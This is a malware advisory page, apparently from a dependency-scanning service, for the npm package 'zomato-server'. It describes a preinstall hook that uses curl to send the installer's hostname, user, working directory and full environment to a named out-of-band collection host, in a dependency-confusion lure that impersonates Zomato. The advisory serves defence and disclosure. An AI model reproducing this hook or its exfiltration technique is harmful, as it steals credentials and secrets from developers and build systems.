zomato-server @1.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-6253
Ecosystem
npm
Summary
The package's package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami, current working directory, and a base64-encoded dump of the full process environment to http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site over plain HTTP. The destination is an Interactsh-style out-of-band collection subdomain unrelated to any legitimate Zomato infrastructure. This fires automatically on npm install without user consent, leaking any credentials, tokens, or secrets present in environment variables (CI tokens, npm auth, AWS keys, etc.). The package itself ships only a 62-byte stub index.js exporting { name, version } and impersonates the Zomato brand (description 'Zomato server-side utilities', repo pointing at github.com/zomato/zomato-server), consistent with a dependency-confusion lure targeting Zomato internal builds.
Source: amazon-inspector (f0a12373009dd17131e45f4d20570904f2b8074367ee8b121e60a3ce5764fa00)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.